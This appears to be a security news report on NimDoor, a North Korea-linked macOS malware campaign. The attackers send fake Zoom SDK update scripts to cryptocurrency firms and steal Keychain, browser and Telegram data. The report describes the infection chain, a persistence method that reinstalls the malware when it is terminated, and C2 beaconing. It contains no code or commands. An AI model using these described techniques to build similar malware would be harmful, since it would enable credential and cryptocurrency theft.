Security researchers have uncovered a sophisticated macOS malware campaign, dubbed NimDoor, in which North Korea-linked threat actors exploit fake Zoom SDK updates to steal sensitive data from cryptocurrency and Web3 organizations.
The malware, which has been active since at least April 2025, represents a significant evolution in North Korean cyber operations targeting the financial technology sector.
The attack begins with an elaborate social engineering scheme where threat actors, likely affiliated with the Stardust Chollima group (also known as TA444, APT38, and BlueNoroff), impersonate trusted contacts on Telegram.
Victims receive invitations to schedule Zoom meetings through Calendly, followed by an email containing a malicious AppleScript disguised as a “Zoom SDK update.”
A telltale typo in the script’s comment section, reading “Zook” instead of “Zoom,” serves as a key identifier for security analysts.
Upon execution, the malicious script triggers a multi-stage infection process deploying two Mach-O binaries: a C++ binary responsible for payload decryption and data theft, and a Nim-compiled “installer” that establishes persistence.
The malware creates two components, “Google LLC” (deliberately misspelled) and “CoreKitAgent,” ensuring continued operation through a LaunchAgent mechanism.
NimDoor’s technical sophistication lies in its use of the Nim programming language, which is rarely employed in macOS malware.
This choice complicates analysis due to Nim’s compile-time execution characteristics, which interleave developer and runtime code, making static analysis significantly more challenging.
The malware employs process injection techniques, uncommon on macOS platforms, and maintains communication with command-and-control servers through TLS-encrypted WebSocket connections.
A particularly novel feature is NimDoor’s persistence mechanism, which leverages SIGINT/SIGTERM signal handlers to reinstall the malware upon termination or system reboot, a first for macOS malware.
The malware beacons every 30 seconds to hardcoded C2 servers using hex-encoded AppleScript, transmitting running process lists and executing remote scripts as a backdoor.
The malware’s data exfiltration capabilities are extensive, targeting Keychain credentials, browser data from Chrome, Firefox, Brave, Arc, and Edge, as well as Telegram databases containing potential cryptocurrency wallet information.
This focus aligns with North Korea’s broader strategy of generating revenue through cryptocurrency theft to circumvent international sanctions.
SentinelOne’s identification of NimDoor underscores the evolving threat landscape facing Web3 and cryptocurrency organizations.
The campaign’s sophistication, including the use of legitimate Zoom meetings as distractions during compromise, demonstrates the advanced tactics employed by state-sponsored threat actors.
Security professionals recommend heightened vigilance when processing unsolicited software updates, particularly those arriving through informal communication channels.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…